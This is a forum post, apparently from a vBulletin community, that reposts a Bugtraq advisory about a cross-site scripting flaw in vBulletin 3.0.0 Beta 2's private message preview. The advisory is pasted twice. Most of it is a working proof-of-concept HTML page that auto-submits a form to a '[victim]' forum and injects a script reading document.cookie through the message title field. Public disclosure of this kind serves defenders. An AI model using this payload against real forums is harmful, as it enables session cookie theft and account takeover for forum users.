Tweet
I tried submitting this in the bugs forum, but I can't for some reason, even though I am a vB license owner.
This was posted on bugtraq this afternoon:
--
------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility.
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2
------------------------------------------------------
Vendor Status;
------------------------------------------------------
I can not contact vendor for this issue ! No patch available at the moment;
------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like post thread preview page;
------------------------------------------------------
Exploit Code;
------------------------------------------------------
<html>
<body>
<form action="http://[victim]/forum/private.php" method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You can write your own JS codes
var xss = "\"><script>alert(document.cookie)<\/script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
[email protected]
This was posted on bugtraq this afternoon:
--
------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility.
------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2
------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2
------------------------------------------------------
Vendor Status;
------------------------------------------------------
I can not contact vendor for this issue ! No patch available at the moment;
------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like post thread preview page;
------------------------------------------------------
Exploit Code;
------------------------------------------------------
<html>
<body>
<form action="http://[victim]/forum/private.php" method="post"
name="vbform">
<input type="hidden" name="do" value="insertpm" />
<input type="hidden" name="pmid" value="" />
<input type="hidden" name="forward" value="" />
<input type="hidden" name="receipt" value="0" />
<input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
<textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
<input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
<input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >
<input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
<input type="checkbox" name="signature" value="1" id="cb_signature" />
<input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
<input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies" />
</form>
<script>
//Set Values and Submit
// You can write your own JS codes
var xss = "\"><script>alert(document.cookie)<\/script>";
document.vbform.title.value=xss;
document.vbform.preview.click();
</script>
</body>
</html>
*You may need login first
Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
[email protected]
3.0.0, not 2.3.0, never mind 
Comment